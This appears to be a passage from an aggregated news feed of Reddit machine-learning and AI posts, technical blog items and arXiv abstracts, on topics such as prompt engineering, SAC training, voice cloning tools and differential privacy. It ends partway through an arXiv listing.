    Hewwo ML chads. jk. Now that I have yalls attentions, I wanna ask how important would you rate proper prompt engineering to be? Like would you go as far as to leanr how to prompt a model perfectly, or use a tool for it? And if so do yall rate the tools, or d’you think they’re just forcing their place in the market. Opinions/suggestion/ recommendations welcome, I just wanna know what the general consensus is about prompt engineering submitted by /u/WorriedMentality [link] [comments]  ( 8 min )
    [P] Trying to build a smart ingredient parser app, need some ideas please
    Hey guys, I'm working on a university project where I am developing an Android application that uses OCR to scan ingredient contents on the back of food products and provide detailed descriptions of the ingredients, identify potential allergens, and estimate the healthiness factor of the overall food product. Can you suggest some key ideas/features for which I can use Machine Learning as an extra added implementation for my project? submitted by /u/shrux2k [link] [comments]  ( 8 min )
    [D] ICCV final decision’s announced today!
    Any changes to the score post-rebuttal? Did they even read your rebuttal? submitted by /u/Alarming-Aspect705 [link] [comments]  ( 8 min )
    [D] Looking for papers on human evaluation of xAI techniques
    I hope that this question fits this sub: I'm currently interested in explainable AI methods. I want to incorporate them into a dashboard to increase the transparency and trust in an underlying Text Classification Model. Currently, SHAP looks promising, but I'm wondering: Which methods work best from a non-technical enduser perspective? What do I need to consider during the design phase? I haven't found good papers that compare different methods and their effectiveness. Does anyone know good papers regarding this? submitted by /u/zeoNoeN [link] [comments]  ( 8 min )
    [D] pytorch lighting vs huggingface for production on azure ml
    Hi, Recently i joined company and there is discussion of transition from custom pytorch interface to pytorch lightning or huggingface interface for ml training and deployment on azure ml. Product related to CV and NLP. Anyone maybe have some experience or pros/cons of each for production ml development? submitted by /u/ApplicationOne582 [link] [comments]  ( 8 min )
    [D] Simple sequence prediction problem
    Hello, I'm not an expert of ML or any AI topics but have played in the past using LSTMs + RNN for character/word prediction. I'm wondering what -as of today- best model or method should be used to predict sequences. The dataset can be constructed by me in two ways. Either way it is going to be a fixed 31+space (32) word: Having human readable characters like (ZaaaaZZZZZZZZZZZAZZZZZaAAaZZZZZ ZbbbbZZZZZZZZZZZBZZZZZbBBbbBZZZ CccccccZZZZZZZZZCZZZZZcCCccCCZZ DddddddddZZZdddDDDZZZZdDDddDDZY EeeeeeeeeZZZEeeEEEZZZZeEEeeEEZY FfffffffFZZZFffFFFZZZZfFFffFFZY GgggggggGGggGggGGGGgGggGGggGGGY) Having UTF-8 characters like (^BȁȂȃ؃؄؅؆؇؈؉؊؋،؍Џ؏ؐؑȕ^Y^ZȘؘؙ؛؜ ׿^DȄȆȈ؉؋؍؏ؑؓ؛؝РﺀﺃﺇﺍﺓȬ57Ȳ;ȶﻂﻋػ ȁ^FȇȊȍȐȓؘؕ؛؞ﺀﺅﺎﺘﺣбﺲﻀﻋؼؿɃMPɌVɒ\ٗٚ Ȃ^HȊȎȒȖȚȞȢﺇﺔﺣȲȶAȾтɆﻯٍّɚeiɦqɮyٵ ȃ^KȍȒȗȜȡȦȫﺪﺸﻋFɄPɎѓɘٜ١٦٫ɱ}ʀʊړ Ȅ^MȐȖȜȢȨȮȴﻉؿﻡSɒ_ɞѤqٯٵٻځʈʚ§ʦ³ڱ¿ ȅ^OȓȚȡȨȯȶȽﻚﻳّ`gnɮѵڂډڐڗʟ­´ʴÂ˂ÐۏÞ Ȇ^QȖȞȦȮȶEɆٍٕmu}ɾ҆ڕڝڥڭʶÅÍˎÝ˞íۭý ȇ^SșȢȫȴȽMɏɘɡqzʎҗ§ʩ¹Â˄ˍÝæ˨ø˺ĊԌĜ) Both contain the same information and is an encoded sequence of states. I'm trying to predict the states. You notice that in the 1) the first word is "a" or "A" while the next sequence is going to be "b"/"B" and the third sequence is "c"/"C and so on. The same logic applies to the UTF-8. Each character here matters. The file contains around 3924 lines, each one looking either 1) or 2). I dont know, if a) which encoding is more appropriate for ML character prediction b) which model/technology to use to generate these sequences if I input a start pattern, e.g. (ZaaaaZZZZZZZZZZZAZZZZZaAAaZZZZZ ZbbbbZZZZZZZZZZZBZZZZZbBBbbBZZZ CccccccZZZZZZZZZCZZZZZcCCccCCZZ) it should generate the most likely probable next sequences. Historically, char-rnn was used for this problem and the result was so so. Can anyone pls point me out to the right solution for this problem and maybe some github examples to try on this? submitted by /u/mcr-ksh [link] [comments]  ( 9 min )
    [P] Unleashing Insights: Guiding Synthetic Data Generation through Interactive Exploration in Spotlight 🚀
    I wrote an article in which I explored the power of interactive data exploration with Spotlight for synthetic data generation. I highlighted the challenges of working with Jupyter Notebooks and introduced Spotlight as an alternative tool. By leveraging Spotlight's features, such as similarity maps and histograms, I uncovered critical segments in the dataset and provided actionable insights for synthetic data generation. Join me on this journey to unlock the full potential of your data! Check out the full article for all the details. Article on medium: Link Happy learning! ​ https://i.redd.it/hdc0c0fw0wbb1.gif submitted by /u/ml-wizard [link] [comments]  ( 8 min )
  • Open

    Hey guys in this video I test to see if A.I knows where I Live!
    submitted by /u/NJ_Highways [link] [comments]  ( 8 min )
    AI Beyond Software: Robotics, Autonomous Vehicle, Drones, and more
    Hello everyone! We've witnessed a surge of AI-powered tools flooding the market, particularly in the SaaS category. But what about other domains like robotics and agriculture? AI is making great strides in those fields too, and I've come across some fascinating innovations and technologies that aim to enhance our lives. From autonomous vehicles to weed-killing robots, self-checkout shopping, and more, I've compiled them all in one place and would love to share them with you. Here's the link: https://favird.com/l/ai-beyond-software The list is regularly updated, and I'll keep adding new items as soon as I discover them. If you have any recommendations you'd like to share, please submit them there so we can explore and learn together. It would be greatly appreciated if you could also share the link, as it will help the list grow faster. Thanks, and cheers! submitted by /u/GrabWorking3045 [link] [comments]  ( 8 min )
    Using ChatGPT on iPhone
    Do you know how to use ChatGPT on iPhone? submitted by /u/Imagine-your-success [link] [comments]  ( 8 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News & Insights Stability AI launches Stable Doodle, a sketch-to-image tool that converts a simple drawing into a dynamic image. Under the hood, Stable Doodle combines Stable Diffusion XL with T2I-Adapter, which offers additional guidance to pre-trained text-to-image (SDXL) models while keeping the original large text-to-image models unchanged. Stable Doodle is available on the Clipdrop by Stability AI website and app (iOS and Google Play) [Details]. Anthropic launched Claude-2, a ChatGPT rival, supporting up to 100K tokens per prompt (corresponding to around 75,000 words), with enhanced performance in coding, math and reasoning. It’s available via API and a beta website, claude.ai, for US and UK users [Det…  ( 11 min )
    Is there any way I can generate animations for short stories for YouTube videos?
    I have ideas for short stories. Are there any AI related animation sites that I could use to create YouTube short videos? I can figure out the script, story, dialogues, and the audio. I just need the animation videos. submitted by /u/zer0_snot [link] [comments]  ( 8 min )
    Photonic chips to train big matrix operations for AI NN models, a summary by Anastasi in Tech. Multicolored photons are sent in parallel through waveguides in new photonic chips in a field which is rapidly developing, it's 1000 times less power intensive than silicon.
    submitted by /u/MegavirusOfDoom [link] [comments]  ( 8 min )
    are there any good free AI voice tts-generators?
    looking for free "natural" sounding tts for voice narration on youtube videos. submitted by /u/outoffit [link] [comments]  ( 8 min )
    Beginner looking for AI
    Hello guys, I'm currently looking for AIs I can use. I see most of them are paid but I want to use something free. The topics would be video, audio, programming and similar. Any recommendations? submitted by /u/ArraysStartAt1LoL [link] [comments]  ( 8 min )
    Using a bunch of creative AI to help bring my writings on consciousness alive!
    Tldr: I made a cool futuristic decadent of "Leonardo Da Vinci" talk about my ramblings and writings on consciousness. Sometimes we just simply don't have the time to read through some blog posts here there or other people's writings because we're so entrapped within our own readings, or a lot of people just prefer to hear it through audio. I know I love listening and watching too audiobooks or lectures through YouTube. For the longest time I wanted to have my writing spoken through some sort of cool art piece that I developed mysel. Like a futuristic weird looking version of DaVinci that I had in my head and finally through various Al and software tools as well as a couple other little tweaks and things here there. I was able to edit this video to take and bring my writing to life. The first of many hopefully. It was a mixture of DID, DALL-E, Windows Editor, Eleven Labs and my own writing and home brew coding on Auto GPT that made all this possible. It's not perfect by any means, but it's certainly in the right direction of what I want. I make some pretty bold statements and don't always back them up with perfect citations in this so please take this all with a grain of salt. It's meant to foster more thought and questions. Not necessarily decide what reality actually is. Moreover, it's really fun that I was able to get something like this put together with just by myself. I'm sure someone was better editing and video skills could create something far more polished. But as far as things, I've created them pretty proud of it and I think it's pretty proud it too. submitted by /u/Parking-Food-1659 [link] [comments]  ( 9 min )
    "AI is evil"
    A comment posted on one of the AI images I posted on social media without a hint of irony. By this token, electricity is the most evil technology ever developed. In order to run and maintain electricity, humans have committed unspoken atrocities to wildlife and the environment, and may end up making the entire planet uninhabitable at some point. We are also actively stealing energy from future generations, consuming most of what is available to power it within just a handful of generations. Not to mention all the terrible things people have done to other people thanks to electricity. I suppose every human alive today is complicit in that evil by simply harnessing electricity. Unplug that air conditioner, evil complicit scum! I found it humorous that this person made this comment on social media, which also is a technology that has been harnessed for evil purposes. submitted by /u/ShaneKaiGlenn [link] [comments]  ( 8 min )
    The workers at the frontlines of the AI revolution - Rest of World
    submitted by /u/Jojuj [link] [comments]  ( 8 min )
    I found this video online. The voice is for sure AI, but im not fully convinced the guy is, thoughts? And if he is AI, what program did they use to make him?
    submitted by /u/GlaceLitz [link] [comments]  ( 8 min )
    Looking for an AI to find a song using audio clip
    Looking for the full song from the outro of a YouTube video I heard submitted by /u/The84th [link] [comments]  ( 8 min )
    Lawsuit Claims Stability AI's CEO Misled Cofounder to Sell 15% Stake for $100
    submitted by /u/TheSlammedCars [link] [comments]  ( 8 min )
    An AI to clone voices.
    Hi everyone, I'm searching for an AI that can clone voices. I know there's a lot of them on the Internet but I couldn't find the one I need. My project is to reproduce voices from Disney characters to make them say texts I wrote. Is it possible ? submitted by /u/Zumcddo [link] [comments]  ( 8 min )
    Best AI or program to recreate a voice from limited recordings
    I'm looking for a AI or service that can be used to recreate a voice from existing recordings. I have a handful of voicemails from my mother who has since passed. I am trying to see if there is a way to recreate her voice, however most online "AI Voice Creation" sites I found want one or more specific sentences read by the person who's voice is being recreated, which is obviously impossible in this case. Anyone know of a site or service that might be able to recreate a voice from a half dozen 30 second long voicemail recordings? submitted by /u/animeace01 [link] [comments]  ( 8 min )
    I got an AI NPC to admit it's an NPC!
    submitted by /u/RandoEncounter [link] [comments]  ( 8 min )
    160 000 actors are going on strike due to the threat of generative AI
    This is the first massive strike since 1960 and one of the key reasons behind it is generative AI. What do you think? Txt to video takes over Hollywood in the next couple of years? Link to the BBC article. submitted by /u/Ok-Judgment-1181 [link] [comments]  ( 8 min )
    Working on my first public project and have some questions about data bases and their worth, along with information on how ethical certain public data bases are to use.
    So I mainly generate my own data bases via algorithms or paid users that write the data I use for my private models, thing is Its expensive when working on a massive project and my current project is an advanced form of text generation and chat capabilities, so my question here specifically is: I found a data base on kaggle of 51 million discord messages from anonyms users, they have context but still require a lot of refinement and work on them, but is it ethical to use this data base which was probably collected without the knowledge of the anonyms users present in it as discords TOS are against such Data-bases and data collection...? submitted by /u/JamesAibr [link] [comments]  ( 8 min )
  • Open

    Deconstructing an agents policy
    Has anyone seen any papers or heard of research that tries to take an agents policy and return not just the optimal set of actions, but the following next n number of suboptimal sets of actions to achieve the objective/goal? Hopefully that makes sense In the simplest case, gridworld can take many paths to achieve the goal state. In practice after training the agent returns the optimal path. Is there instead a way to return the top 5 say optimal paths? This seems like it might be in the literature or research somewhere, but I'm struggling to find any papers that address or even note something like this submitted by /u/Peneloki [link] [comments]  ( 8 min )
    Open loop planning: a sequence of blind inputs that beats _Pokémon FireRed_ 99% of the time
    submitted by /u/gwern [link] [comments]  ( 8 min )
    "Instruction Mining: High-Quality Instruction Data Selection for Large Language Models", Cao et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    SAC underactuated pendulum problem
    I'm currently working on a project involving the underactuated pendulum problem, specifically known as the 'unbalanced disk'. You can find the code base here. I am using the reward function of pendulum v1. I've had success solving the problem with DQN, and improved it using hyperparameter optimization to enhance its performance, this worked fine and all. However, I would like to use SAC to solve this environment as well. You can find the SAC implementation I'm using here, I changed small things to make the environment work, and added mixed precision training to speed up training. Here is an image of the environment getting stuck on that position as well. The black arrow shows the direction of the force being applied. https://preview.redd.it/uuwtqvbjgxbb1.png?width=475&format=png&auto=webp&s=7a13693d5a84339726edb9b394a0fca5c9f5bc35 My main challenge right now is that the SAC algorithm does not converge to the desired result. Rather than reaching the top of the pendulum swing as intended, it settles at the side position. I understand that the issue probably is the fact that it has to swing first. However, DQN was capable of doing it, so I wonder why SAC wouldn't. I've been running a series of hyperparameter optimizations in an attempt to find the right combination that can solve this environment. However, it didn't work so far. Here are the ranges I've been using for the hyperparameter search space: ​ lr = trial.suggest_float('lr', 1e-5, 1e-4, log=True) batch = trial.suggest_categorical('batch', [32, 64, 128, 256]) gamma = trial.suggest_float('gamma', 0.90, 0.999) alpha = trial.suggest_float('alpha', 0.01, 0.5) polyak = trial.suggest_float('polyak', 0.01, 0.9) If someone has some pointers to solve this, please let me know!Most learning curves look like this as well: https://preview.redd.it/dj5sp7ikhxbb1.png?width=566&format=png&auto=webp&s=5b50c98a82a4a2d9499ea6bc87132f3b4424da99 submitted by /u/r3ktIKevin [link] [comments]  ( 9 min )
  • Open

    Large language models and mnemonics
    The Major mnemonic system encodes numbers as words in order to make them easier to remember. Digits correspond to consonant sounds (not spellings) as explained here. You can use the system ad hoc, improvising an encoding of a word as needed, or you can memorize canonical encodings of numbers, also known as pegs. Pegs have […] Large language models and mnemonics first appeared on John D. Cook.  ( 7 min )
    When does a function have an addition theorem?
    Motivating examples The addition theorem for cosine says that and the addition theorem for hyperbolic cosine is analogous, though with a sign change. An addition theorem is a theorem that relates a function’s value at x + y to its values at x and at y. The squaring function satisfies a very simple addition theorem […] When does a function have an addition theorem? first appeared on John D. Cook.  ( 6 min )
  • Open

    AI helps household robots cut planning time in half
    PIGINet leverages machine learning to streamline and enhance household robots' task and motion planning, by assessing and filtering feasible solutions in complex environments.  ( 9 min )
    Study finds ChatGPT boosts worker productivity for some writing tasks
    A new report by MIT researchers highlights the potential of generative AI to help workers with certain writing assignments.  ( 9 min )
    A new way to look at data privacy
    Researchers create a privacy technique that protects sensitive data while maintaining a machine-learning model’s performance.  ( 10 min )
  • Open

    How Do Companies Use Artificial Intelligence?
    By now, AI-based tools have totally changed the way companies operate across all industries. The use of AI in them to streamline operations, make informed decisions, and enhance customer experiences.  Companies utilize AI in a multitude of ways, such as automating repetitive tasks, predicting customer behavior, and optimizing supply chain management. Today, we will dive… Read More »How Do Companies Use Artificial Intelligence? The post How Do Companies Use Artificial Intelligence? appeared first on Data Science Central.  ( 21 min )
  • Open

    Training Diffusion Models with Reinforcement Learning
    function reveal() { const replay = document.querySelector('.ddpo-replay'); replay.style.display = 'flex'; } window.onload = () => { const replay = document.querySelector('.ddpo-replay'); replay.addEventListener('click', () => { const video = document.querySelector('.ddpo-video'); video.currentTime = 0; video.play(); replay.style.display = 'none'; }); } Training Diffusion Models with Reinforcement Learning replay Diffusion models have recently emerged as the de facto standard for generating complex, high-dimensional outputs. You may know them for their ability to produce stunning AI art and hyper-realistic synthetic images, but they have also found success in oth…  ( 7 min )
  • Open

    Prospective Learning: Principled Extrapolation to the Future. (arXiv:2201.07372v2 [cs.LG] UPDATED)
    Learning is a process which can update decision rules, based on past experience, such that future performance improves. Traditionally, machine learning is often evaluated under the assumption that the future will be identical to the past in distribution or change adversarially. But these assumptions can be either too optimistic or pessimistic for many problems in the real world. Real world scenarios evolve over multiple spatiotemporal scales with partially predictable dynamics. Here we reformulate the learning problem to one that centers around this idea of dynamic futures that are partially learnable. We conjecture that certain sequences of tasks are not retrospectively learnable (in which the data distribution is fixed), but are prospectively learnable (in which distributions may be dynamic), suggesting that prospective learning is more difficult in kind than retrospective learning. We argue that prospective learning more accurately characterizes many real world problems that (1) currently stymie existing artificial intelligence solutions and/or (2) lack adequate explanations for how natural intelligences solve them. Thus, studying prospective learning will lead to deeper insights and solutions to currently vexing challenges in both natural and artificial intelligences.  ( 3 min )
    Provably Faster Gradient Descent via Long Steps. (arXiv:2307.06324v2 [math.OC] UPDATED)
    This work establishes provably faster convergence rates for gradient descent via a computer-assisted analysis technique. Our theory allows nonconstant stepsize policies with frequent long steps potentially violating descent by analyzing the overall effect of many iterations at once rather than the typical one-iteration inductions used in most first-order method analyses. We show that long steps, which may increase the objective value in the short term, lead to provably faster convergence in the long term. A conjecture towards proving a faster $O(1/T\log T)$ rate for gradient descent is also motivated along with simple numerical validation.
    Revisiting Discrete Soft Actor-Critic. (arXiv:2209.10081v3 [cs.LG] UPDATED)
    We study the adaption of soft actor-critic (SAC) from continuous action space to discrete action space. We revisit vanilla SAC and provide an in-depth understanding of its Q value underestimation and performance instability issues when applied to discrete settings. We thereby propose entropy-penalty and double average Q-learning with Q-clip to address these issues. Extensive experiments on typical benchmarks with discrete action space, including Atari games and a large-scale MOBA game, show the efficacy of our proposed method. Our code is at:https://github.com/coldsummerday/Revisiting-Discrete-SAC.  ( 2 min )
    Personalized Anomaly Detection in PPG Data using Representation Learning and Biometric Identification. (arXiv:2307.06380v1 [cs.LG])
    Photoplethysmography (PPG) signals, typically acquired from wearable devices, hold significant potential for continuous fitness-health monitoring. In particular, heart conditions that manifest in rare and subtle deviating heart patterns may be interesting. However, robust and reliable anomaly detection within these data remains a challenge due to the scarcity of labeled data and high inter-subject variability. This paper introduces a two-stage framework leveraging representation learning and personalization to improve anomaly detection performance in PPG data. The proposed framework first employs representation learning to transform the original PPG signals into a more discriminative and compact representation. We then apply three different unsupervised anomaly detection methods for movement detection and biometric identification. We validate our approach using two different datasets in both generalized and personalized scenarios. The results show that representation learning significantly improves anomaly detection performance while reducing the high inter-subject variability. Personalized models further enhance anomaly detection performance, underscoring the role of personalization in PPG-based fitness-health monitoring systems. The results from biometric identification show that it's easier to distinguish a new user from one intended authorized user than from a group of users. Overall, this study provides evidence of the effectiveness of representation learning and personalization for anomaly detection in PPG data.  ( 2 min )
    On the Connection between Game-Theoretic Feature Attributions and Counterfactual Explanations. (arXiv:2307.06941v1 [cs.AI])
    Explainable Artificial Intelligence (XAI) has received widespread interest in recent years, and two of the most popular types of explanations are feature attributions, and counterfactual explanations. These classes of approaches have been largely studied independently and the few attempts at reconciling them have been primarily empirical. This work establishes a clear theoretical connection between game-theoretic feature attributions, focusing on but not limited to SHAP, and counterfactuals explanations. After motivating operative changes to Shapley values based feature attributions and counterfactual explanations, we prove that, under conditions, they are in fact equivalent. We then extend the equivalency result to game-theoretic solution concepts beyond Shapley values. Moreover, through the analysis of the conditions of such equivalence, we shed light on the limitations of naively using counterfactual explanations to provide feature importances. Experiments on three datasets quantitatively show the difference in explanations at every stage of the connection between the two approaches and corroborate the theoretical findings.
    Control Transformer: Robot Navigation in Unknown Environments through PRM-Guided Return-Conditioned Sequence Modeling. (arXiv:2211.06407v3 [cs.RO] UPDATED)
    Learning long-horizon tasks such as navigation has presented difficult challenges for successfully applying reinforcement learning to robotics. From another perspective, under known environments, sampling-based planning can robustly find collision-free paths in environments without learning. In this work, we propose Control Transformer that models return-conditioned sequences from low-level policies guided by a sampling-based Probabilistic Roadmap (PRM) planner. We demonstrate that our framework can solve long-horizon navigation tasks using only local information. We evaluate our approach on partially-observed maze navigation with MuJoCo robots, including Ant, Point, and Humanoid. We show that Control Transformer can successfully navigate through mazes and transfer to unknown environments. Additionally, we apply our method to a differential drive robot (Turtlebot3) and show zero-shot sim2real transfer under noisy observations.
    Hybrid Control Policy for Artificial Pancreas via Ensemble Deep Reinforcement Learning. (arXiv:2307.06501v1 [cs.AI])
    Objective: The artificial pancreas (AP) has shown promising potential in achieving closed-loop glucose control for individuals with type 1 diabetes mellitus (T1DM). However, designing an effective control policy for the AP remains challenging due to the complex physiological processes, delayed insulin response, and inaccurate glucose measurements. While model predictive control (MPC) offers safety and stability through the dynamic model and safety constraints, it lacks individualization and is adversely affected by unannounced meals. Conversely, deep reinforcement learning (DRL) provides personalized and adaptive strategies but faces challenges with distribution shifts and substantial data requirements. Methods: We propose a hybrid control policy for the artificial pancreas (HyCPAP) to address the above challenges. HyCPAP combines an MPC policy with an ensemble DRL policy, leveraging the strengths of both policies while compensating for their respective limitations. To facilitate faster deployment of AP systems in real-world settings, we further incorporate meta-learning techniques into HyCPAP, leveraging previous experience and patient-shared knowledge to enable fast adaptation to new patients with limited available data. Results: We conduct extensive experiments using the FDA-accepted UVA/Padova T1DM simulator across three scenarios. Our approaches achieve the highest percentage of time spent in the desired euglycemic range and the lowest occurrences of hypoglycemia. Conclusion: The results clearly demonstrate the superiority of our methods for closed-loop glucose management in individuals with T1DM. Significance: The study presents novel control policies for AP systems, affirming the great potential of proposed methods for efficient closed-loop glucose control.  ( 3 min )
    Learning IMM Filter Parameters from Measurements using Gradient Descent. (arXiv:2307.06618v1 [cs.LG])
    The performance of data fusion and tracking algorithms often depends on parameters that not only describe the sensor system, but can also be task-specific. While for the sensor system tuning these variables is time-consuming and mostly requires expert knowledge, intrinsic parameters of targets under track can even be completely unobservable until the system is deployed. With state-of-the-art sensor systems growing more and more complex, the number of parameters naturally increases, necessitating the automatic optimization of the model variables. In this paper, the parameters of an interacting multiple model (IMM) filter are optimized solely using measurements, thus without necessity for any ground-truth data. The resulting method is evaluated through an ablation study on simulated data, where the trained model manages to match the performance of a filter parametrized with ground-truth values.
    Filling time-series gaps using image techniques: Multidimensional context autoencoder approach for building energy data imputation. (arXiv:2307.05926v2 [cs.LG] UPDATED)
    Building energy prediction and management has become increasingly important in recent decades, driven by the growth of Internet of Things (IoT) devices and the availability of more energy data. However, energy data is often collected from multiple sources and can be incomplete or inconsistent, which can hinder accurate predictions and management of energy systems and limit the usefulness of the data for decision-making and research. To address this issue, past studies have focused on imputing missing gaps in energy data, including random and continuous gaps. One of the main challenges in this area is the lack of validation on a benchmark dataset with various building and meter types, making it difficult to accurately evaluate the performance of different imputation methods. Another challenge is the lack of application of state-of-the-art imputation methods for missing gaps in energy data. Contemporary image-inpainting methods, such as Partial Convolution (PConv), have been widely used in the computer vision domain and have demonstrated their effectiveness in dealing with complex missing patterns. To study whether energy data imputation can benefit from the image-based deep learning method, this study compared PConv, Convolutional neural networks (CNNs), and weekly persistence method using one of the biggest publicly available whole building energy datasets, consisting of 1479 power meters worldwide, as the benchmark. The results show that, compared to the CNN with the raw time series (1D-CNN) and the weekly persistence method, neural network models with reshaped energy data with two dimensions reduced the Mean Squared Error (MSE) by 10% to 30%. The advanced deep learning method, Partial convolution (PConv), has further reduced the MSE by 20-30% than 2D-CNN and stands out among all models.
    Efficient SGD Neural Network Training via Sublinear Activated Neuron Identification. (arXiv:2307.06565v1 [cs.LG])
    Deep learning has been widely used in many fields, but the model training process usually consumes massive computational resources and time. Therefore, designing an efficient neural network training method with a provable convergence guarantee is a fundamental and important research question. In this paper, we present a static half-space report data structure that consists of a fully connected two-layer neural network for shifted ReLU activation to enable activated neuron identification in sublinear time via geometric search. We also prove that our algorithm can converge in $O(M^2/\epsilon^2)$ time with network size quadratic in the coefficient norm upper bound $M$ and error term $\epsilon$.
    Balanced Coarsening for Multilevel Hypergraph Partitioning via Wasserstein Discrepancy. (arXiv:2106.07501v2 [cs.LG] UPDATED)
    We propose a balanced coarsening scheme for multilevel hypergraph partitioning. In addition, an initial partitioning algorithm is designed to improve the quality of k-way hypergraph partitioning. By assigning vertex weights through the LPT algorithm, we generate a prior hypergraph under a relaxed balance constraint. With the prior hypergraph, we have defined the Wasserstein discrepancy to coordinate the optimal transport of coarsening process. And the optimal transport matrix is solved by Sinkhorn algorithm. Our coarsening scheme fully takes into account the minimization of connectivity metric (objective function). For the initial partitioning stage, we define a normalized cut function induced by Fiedler vector, which is theoretically proved to be a concave function. Thereby, a three-point algorithm is designed to find the best cut under the balance constraint.
    EfficientNet Algorithm for Classification of Different Types of Cancer. (arXiv:2304.08715v3 [eess.IV] UPDATED)
    Accurate and efficient classification of different types of cancer is critical for early detection and effective treatment. In this paper, we present the results of our experiments using the EfficientNet algorithm for classification of brain tumor, breast cancer mammography, chest cancer, and skin cancer. We used publicly available datasets and preprocessed the images to ensure consistency and comparability. Our experiments show that the EfficientNet algorithm achieved high accuracy, precision, recall, and F1 scores on each of the cancer datasets, outperforming other state-of-the-art algorithms in the literature. We also discuss the strengths and weaknesses of the EfficientNet algorithm and its potential applications in clinical practice. Our results suggest that the EfficientNet algorithm is well-suited for classification of different types of cancer and can be used to improve the accuracy and efficiency of cancer diagnosis.
    Differentially Private Synthetic Data Generation via Lipschitz-Regularised Variational Autoencoders. (arXiv:2304.11336v2 [cs.LG] UPDATED)
    Synthetic data has been hailed as the silver bullet for privacy preserving data analysis. If a record is not real, then how could it violate a person's privacy? In addition, deep-learning based generative models are employed successfully to approximate complex high-dimensional distributions from data and draw realistic samples from this learned distribution. It is often overlooked though that generative models are prone to memorising many details of individual training records and often generate synthetic data that too closely resembles the underlying sensitive training data, hence violating strong privacy regulations as, e.g., encountered in health care. Differential privacy is the well-known state-of-the-art framework for guaranteeing protection of sensitive individuals' data, allowing aggregate statistics and even machine learning models to be released publicly without compromising privacy. The training mechanisms however often add too much noise during the training process, and thus severely compromise the utility of these private models. Even worse, the tight privacy budgets do not allow for many training epochs so that model quality cannot be properly controlled in practice. In this paper we explore an alternative approach for privately generating data that makes direct use of the inherent stochasticity in generative models, e.g., variational autoencoders. The main idea is to appropriately constrain the continuity modulus of the deep models instead of adding another noise mechanism on top. For this approach, we derive mathematically rigorous privacy guarantees and illustrate its effectiveness with practical experiments.
    Large Language Models for Supply Chain Optimization. (arXiv:2307.03875v2 [cs.AI] UPDATED)
    Supply chain operations traditionally involve a variety of complex decision making problems. Over the last few decades, supply chains greatly benefited from advances in computation, which allowed the transition from manual processing to automation and cost-effective optimization. Nonetheless, business operators still need to spend substantial efforts in explaining and interpreting the optimization outcomes to stakeholders. Motivated by the recent advances in Large Language Models (LLMs), we study how this disruptive technology can help bridge the gap between supply chain automation and human comprehension and trust thereof. We design OptiGuide -- a framework that accepts as input queries in plain text, and outputs insights about the underlying optimization outcomes. Our framework does not forgo the state-of-the-art combinatorial optimization technology, but rather leverages it to quantitatively answer what-if scenarios (e.g., how would the cost change if we used supplier B instead of supplier A for a given demand?). Importantly, our design does not require sending proprietary data over to LLMs, which can be a privacy concern in some circumstances. We demonstrate the effectiveness of our framework on a real server placement scenario within Microsoft's cloud supply chain. Along the way, we develop a general evaluation benchmark, which can be used to evaluate the accuracy of the LLM output in other scenarios.
    Data Augmentation in Training CNNs: Injecting Noise to Images. (arXiv:2307.06855v1 [cs.CV])
    Noise injection is a fundamental tool for data augmentation, and yet there is no widely accepted procedure to incorporate it with learning frameworks. This study analyzes the effects of adding or applying different noise models of varying magnitudes to Convolutional Neural Network (CNN) architectures. Noise models that are distributed with different density functions are given common magnitude levels via Structural Similarity (SSIM) metric in order to create an appropriate ground for comparison. The basic results are conforming with the most of the common notions in machine learning, and also introduce some novel heuristics and recommendations on noise injection. The new approaches will provide better understanding on optimal learning procedures for image classification.
    Towards Safe Autonomous Driving Policies using a Neuro-Symbolic Deep Reinforcement Learning Approach. (arXiv:2307.01316v2 [cs.RO] UPDATED)
    The dynamic nature of driving environments and the presence of diverse road users pose significant challenges for decision-making in autonomous driving. Deep reinforcement learning (DRL) has emerged as a popular approach to tackle this problem. However, the application of existing DRL solutions is mainly confined to simulated environments due to safety concerns, impeding their deployment in real-world. To overcome this limitation, this paper introduces a novel neuro-symbolic model-free DRL approach, called DRL with Symbolic Logics (DRLSL) that combines the strengths of DRL (learning from experience) and symbolic first-order logics (knowledge-driven reasoning) to enable safe learning in real-time interactions of autonomous driving within real environments. This innovative approach provides a means to learn autonomous driving policies by actively engaging with the physical environment while ensuring safety. We have implemented the DRLSL framework in autonomous driving using the highD dataset and demonstrated that our method successfully avoids unsafe actions during both the training and testing phases. Furthermore, our results indicate that DRLSL achieves faster convergence during training and exhibits better generalizability to new driving scenarios compared to traditional DRL methods.
    PIGEON: Predicting Image Geolocations. (arXiv:2307.05845v2 [cs.CV] UPDATED)
    We introduce PIGEON, a multi-task end-to-end system for planet-scale image geolocalization that achieves state-of-the-art performance on both external benchmarks and in human evaluation. Our work incorporates semantic geocell creation with label smoothing, conducts pretraining of a vision transformer on images with geographic information, and refines location predictions with ProtoNets across a candidate set of geocells. The contributions of PIGEON are three-fold: first, we design a semantic geocells creation and splitting algorithm based on open-source data which can be adapted to any geospatial dataset. Second, we show the effectiveness of intra-geocell refinement and the applicability of unsupervised clustering and ProtNets to the task. Finally, we make our pre-trained CLIP transformer model, StreetCLIP, publicly available for use in adjacent domains with applications to fighting climate change and urban and rural scene understanding.
    Differentially Private Decoupled Graph Convolutions for Multigranular Topology Protection. (arXiv:2307.06422v1 [cs.LG])
    Graph learning methods, such as Graph Neural Networks (GNNs) based on graph convolutions, are highly successful in solving real-world learning problems involving graph-structured data. However, graph learning methods expose sensitive user information and interactions not only through their model parameters but also through their model predictions. Consequently, standard Differential Privacy (DP) techniques that merely offer model weight privacy are inadequate. This is especially the case for node predictions that leverage neighboring node attributes directly via graph convolutions that create additional risks of privacy leakage. To address this problem, we introduce Graph Differential Privacy (GDP), a new formal DP framework tailored to graph learning settings that ensures both provably private model parameters and predictions. Furthermore, since there may be different privacy requirements for the node attributes and graph structure, we introduce a novel notion of relaxed node-level data adjacency. This relaxation can be used for establishing guarantees for different degrees of graph topology privacy while maintaining node attribute privacy. Importantly, this relaxation reveals a useful trade-off between utility and topology privacy for graph learning methods. In addition, our analysis of GDP reveals that existing DP-GNNs fail to exploit this trade-off due to the complex interplay between graph topology and attribute data in standard graph convolution designs. To mitigate this problem, we introduce the Differentially Private Decoupled Graph Convolution (DPDGC) model, which benefits from decoupled graph convolution while providing GDP guarantees. Extensive experiments on seven node classification benchmarking datasets demonstrate the superior privacy-utility trade-off of DPDGC over existing DP-GNNs based on standard graph convolution design.  ( 3 min )
    A Causal Framework to Unify Common Domain Generalization Approaches. (arXiv:2307.06825v1 [cs.LG])
